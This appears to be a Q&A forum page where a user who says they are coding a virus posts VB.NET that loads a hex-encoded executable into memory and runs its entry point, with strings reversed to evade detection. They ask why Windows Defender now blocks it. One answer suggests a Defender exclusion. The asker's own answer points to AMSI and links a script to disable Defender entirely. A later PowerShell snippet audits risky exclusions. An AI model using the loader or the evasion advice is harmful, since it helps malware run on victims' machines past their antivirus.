5

Guys, I have a problem while coding in VB.NET in Visual Studio. Here's my code, which converts an .EXE file's hex to bytes and runs it directly from memory.

    Imports System.Linq, System.Reflection
    Public Module Module1
        Public Sub Main()
            Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
            Dim q1 As Object = Assembly.Load(HexToByte(n))
            Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
            Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)

        End Sub
        Public Function HexToByte(ByVal str As String) As Byte()
            Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
            Return xData
        End Function
    End Module

When I debug it using the F5 key, it shows the full message below:

System.BadImageFormatException: 
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. 
An attempt was made to load a program with an incorrect format.'

And also

Inner Exception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
(Exception from HRESULT: 0x800700E1)

Guys, as these messages state, I am coding a virus, and that is true.
But I have used this code a lot of times and it didn't return any exception.
But now it doesn't allow me. How do I fix this?

Sorry IwontTell
  • 466
  • 10
  • 29

2 Answers

2

I just ran into the same problem while executing some Golang code on Windows 10. It turns out that Windows Security has been treating the temporary file used for running my app.go script, in something like C:\Users\<user-name>\AppData\Local\Temp\go-buildxxxxxxxxx\b00x\exe\app.exe, as a virus or potentially unwanted software. One quick fix is to add an exclusion via Windows Security by extension, but I am not sure if this is best practice, because this would weaken your security.

Note that the "x" characters above represent digits that I am hiding to keep things generic.

Kris Stern
  • 1,192
  • 1
  • 15
  • 23
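
An added example, not part of the answer above: a PowerShell audit that flags Microsoft Defender exclusions broader than they need to be, such as the by-extension exclusion the answer is unsure about. The function name `Test-DefenderExclusion`, its rules and the sample values are assumptions made for illustration.

```powershell
# Added example: flag Microsoft Defender exclusions that are broader than needed.
# Test-DefenderExclusion and its rules are hypothetical, not a Microsoft tool.
function Test-DefenderExclusion {
    param(
        [string[]]$Extension = @(),
        [string[]]$Path = @()
    )
    # Extensions that carry executable content: excluding one of them
    # switches off scanning for that file type on every path of the machine.
    $execExt = 'exe', 'dll', 'scr', 'ps1', 'vbs', 'js', 'bat', 'cmd'
    $findings = @()

    foreach ($e in $Extension) {
        # Exclusions may be stored as "exe", ".exe" or "*.exe".
        $name = ($e -replace '^[.*]+', '').ToLowerInvariant()
        if ($execExt -contains $name) {
            $findings += [pscustomobject]@{
                Kind = 'Extension'; Value = $e
                Issue = 'executable file type excluded everywhere'
            }
        }
    }

    foreach ($p in $Path) {
        $norm = $p.TrimEnd('\')
        $issue = $null
        if ($norm -match '^[A-Za-z]:$') {
            $issue = 'whole drive excluded'
        } elseif ($norm -match '\\AppData\\Local\\Temp$|\\Windows\\Temp$') {
            $issue = 'entire temp directory excluded (world of untrusted downloads and unpackers)'
        }
        if ($issue) {
            $findings += [pscustomobject]@{ Kind = 'Path'; Value = $p; Issue = $issue }
        }
    }
    $findings
}

# Constructed sample values; D:\build-tmp stands for a dedicated build directory.
$sample = @{
    Extension = @('.exe', 'log')
    Path      = @('C:\', 'C:\Users\dev\AppData\Local\Temp', 'D:\build-tmp')
}
Test-DefenderExclusion @sample | Format-Table -AutoSize

# On a real host, from an elevated session, audit the live settings instead:
# $mp = Get-MpPreference
# Test-DefenderExclusion -Extension $mp.ExclusionExtension -Path $mp.ExclusionPath
```

With the sample values it reports `.exe`, `C:\` and the user temp directory, and leaves `log` and the dedicated build directory alone.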
0

As it mentions that it contains a virus,
AMSI (a Windows Defender component) is probably blocking the virus from running.

This error message also occurs in PowerShell when executing a malicious command,
and AMSI stops it. Info taken from 0x00-0x00.github.io.

Run this VBS script to disable Defender completely:
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs

Sorry IwontTell
  • 466
  • 10
  • 29
  • [Don't paste images of text](https://meta.stackoverflow.com/q/303812/13860). That's nearly impossible to read. – Jonathan Hall Apr 19 '22 at 10:21
  • 1
    I can read it fine. But it does reduce searchability on the answer, just not as much as the screenshot would have reduced searchability if it were in the question. – Chris Strickland Apr 19 '22 at 10:24